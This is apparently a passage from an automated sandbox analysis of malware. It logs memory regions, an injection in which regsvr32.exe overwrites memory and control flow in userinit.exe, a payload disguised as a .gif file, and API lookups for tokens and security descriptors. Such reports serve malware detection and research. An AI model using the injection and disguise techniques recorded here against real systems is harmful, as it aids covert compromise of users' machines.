private_0x0000000002680000	0x02680000	0x02702fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02706fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0270afff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0270efff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02712fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02716fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0271afff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0271efff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02722fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02726fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0272afff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0272efff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02734fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02738fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0273cfff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02742fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02746fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0274afff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0274efff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02754fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02758fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0275cfff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02762fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02766fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0276afff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0276efff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02774fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02778fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0277cfff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02782fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02786fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0278afff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0278ffff	Private Memory	-	-
private_0x0000000002730000	0x02730000	0x027e0fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x027f6fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x027fafff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x027fefff	Private Memory	rw	-
private_0x0000000002750000	0x02750000	0x02814fff	Private Memory	rw	-
private_0x0000000002750000	0x02750000	0x02818fff	Private Memory	rw	-
private_0x0000000002750000	0x02750000	0x0281cfff	Private Memory	rw	-
private_0x0000000002750000	0x02750000	0x02820fff	Private Memory	rw	-
private_0x0000000002760000	0x02760000	0x02836fff	Private Memory	rw	-
private_0x0000000002760000	0x02760000	0x0283afff	Private Memory	rw	-
private_0x0000000002760000	0x02760000	0x0283efff	Private Memory	rw	-
private_0x0000000002770000	0x02770000	0x02854fff	Private Memory	rw	-
private_0x0000000002770000	0x02770000	0x02858fff	Private Memory	rw	-
private_0x0000000002770000	0x02770000	0x0285cfff	Private Memory	rw	-
private_0x0000000002770000	0x02770000	0x02860fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02876fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0287afff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0287efff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02894fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02898fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x0289cfff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028a2fff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x028c0fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02902fff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x02920fff	Private Memory	rw	-
private_0x0000000002870000	0x02870000	0x02962fff	Private Memory	rw	-
private_0x0000000002880000	0x02880000	0x02980fff	Private Memory	rw	-
private_0x00000000028a0000	0x028a0000	0x029b2fff	Private Memory	rwx	-
private_0x00000000029c0000	0x029c0000	0x02abffff	Private Memory	-	-
private_0x0000000002bc0000	0x02bc0000	0x02cbffff	Private Memory	rw	-
sortdefault.nls	0x02cc0000	0x02f8efff	Memory Mapped File	r	-
comctl32.dll	0x6cc60000	0x6cce3fff	Memory Mapped File	rwx	-
olepro32.dll	0x6ce80000	0x6ce98fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#24: c:\windows\system32\regsvr32.exe	0xf10	address = 0x7ffdd008, size = 4	1	Fn Data
Modify Control Flow	#24: c:\windows\system32\regsvr32.exe	0xf10	os_tid = 0x764, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6ce80000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6cc60000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = ,ó, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6cc9266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6cc92542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6cc91d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6cc9238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6cc920c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6cc91fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6cc91e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6cc91f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6cc91ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6cc9216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6cc922be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6cc921e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6ce820ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6ce820b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6ce820c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6ce820d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 659439	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #38: userinit.exe

222

0

»

Information	Value
ID	#38
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:02:17, Reason: Child Process
Unmonitor	End Time: 00:02:21, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0x8a4
Parent PID	0xf18 (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 89C 0x 884 0x 880

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	rwx	-
pagefile_0x00000000000e0000	0x000e0000	0x000e6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000f0000	0x000f0000	0x000f1fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00100000	0x00100fff	Memory Mapped File	r	-
private_0x0000000000110000	0x00110000	0x00110fff	Private Memory	rwx	-
pagefile_0x0000000000120000	0x00120000	0x00121fff	Pagefile Backed Memory	r	-
private_0x0000000000150000	0x00150000	0x0018ffff	Private Memory	rw	-
userinit.exe	0x00200000	0x00208fff	Memory Mapped File	rwx	-
pagefile_0x0000000000210000	0x00210000	0x002d7fff	Pagefile Backed Memory	r	-
private_0x00000000002e0000	0x002e0000	0x0031ffff	Private Memory	rw	-
private_0x0000000000340000	0x00340000	0x0034ffff	Private Memory	rw	-
private_0x0000000000350000	0x00350000	0x003cffff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x00000000005a0000	0x005a0000	0x0069ffff	Private Memory	rw	-
pagefile_0x00000000006a0000	0x006a0000	0x0129ffff	Pagefile Backed Memory	r	-
private_0x00000000012a0000	0x012a0000	0x0139ffff	Private Memory	-	-
private_0x0000000001410000	0x01410000	0x0141ffff	Private Memory	rw	-
private_0x0000000001420000	0x01420000	0x015affff	Private Memory	rw	-
pagefile_0x0000000001420000	0x01420000	0x014fefff	Pagefile Backed Memory	r	-
private_0x0000000001570000	0x01570000	0x015affff	Private Memory	rw	-
private_0x00000000015b0000	0x015b0000	0x0174ffff	Private Memory	rw	-
private_0x00000000015b0000	0x015b0000	0x016bcfff	Private Memory	rw	-
private_0x0000000001710000	0x01710000	0x0174ffff	Private Memory	rw	-
staticcache.dat	0x01750000	0x0207ffff	Memory Mapped File	r	-
pagefile_0x0000000002080000	0x02080000	0x02472fff	Pagefile Backed Memory	r	-
private_0x0000000002480000	0x02480000	0x0257ffff	Private Memory	rw	-
private_0x0000000002580000	0x02580000	0x0277ffff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02800fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02804fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02808fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0280cfff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02812fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02816fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0281afff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0281efff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02824fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02828fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0282cfff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02832fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02836fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0283afff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0283efff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02844fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02848fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0284cfff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02852fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02856fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0285afff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0285efff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02864fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02868fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0286cfff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02872fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02876fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0287afff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0287efff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02884fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02888fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x0288cfff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x02892fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x02896fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x0289afff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x0289efff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x028b4fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x028b8fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x028bcfff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x028c0fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x028d6fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x028dafff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x028defff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x028f4fff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x028f8fff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x028fcfff	Private Memory	rw	-
private_0x0000000002840000	0x02840000	0x02900fff	Private Memory	rw	-
private_0x0000000002850000	0x02850000	0x02916fff	Private Memory	rw	-
private_0x0000000002850000	0x02850000	0x0291afff	Private Memory	rw	-
private_0x0000000002850000	0x02850000	0x0291efff	Private Memory	rw	-
private_0x0000000002860000	0x02860000	0x02934fff	Private Memory	rw	-
private_0x0000000002860000	0x02860000	0x02938fff	Private Memory	rw	-
private_0x0000000002860000	0x02860000	0x0293cfff	Private Memory	rw	-
private_0x0000000002860000	0x02860000	0x02940fff	Private Memory	rw	-
private_0x0000000002870000	0x02870000	0x02956fff	Private Memory	rw	-
private_0x0000000002870000	0x02870000	0x0295afff	Private Memory	rw	-
private_0x0000000002870000	0x02870000	0x0295efff	Private Memory	rw	-
private_0x0000000002880000	0x02880000	0x02974fff	Private Memory	rw	-
private_0x0000000002880000	0x02880000	0x02978fff	Private Memory	rw	-
private_0x0000000002880000	0x02880000	0x0297cfff	Private Memory	rw	-
private_0x0000000002880000	0x02880000	0x02980fff	Private Memory	rw	-
private_0x0000000002890000	0x02890000	0x02996fff	Private Memory	rw	-
private_0x0000000002890000	0x02890000	0x0299afff	Private Memory	rw	-
private_0x0000000002890000	0x02890000	0x0299ffff	Private Memory	-	-
private_0x00000000028a0000	0x028a0000	0x02930fff	Private Memory	rw	-
private_0x00000000028d0000	0x028d0000	0x02972fff	Private Memory	rw	-
private_0x00000000028e0000	0x028e0000	0x02990fff	Private Memory	rw	-
private_0x0000000002910000	0x02910000	0x029d2fff	Private Memory	rw	-
private_0x0000000002920000	0x02920000	0x029f0fff	Private Memory	rw	-
private_0x0000000002950000	0x02950000	0x02a32fff	Private Memory	rw	-
private_0x0000000002960000	0x02960000	0x02a50fff	Private Memory	rw	-
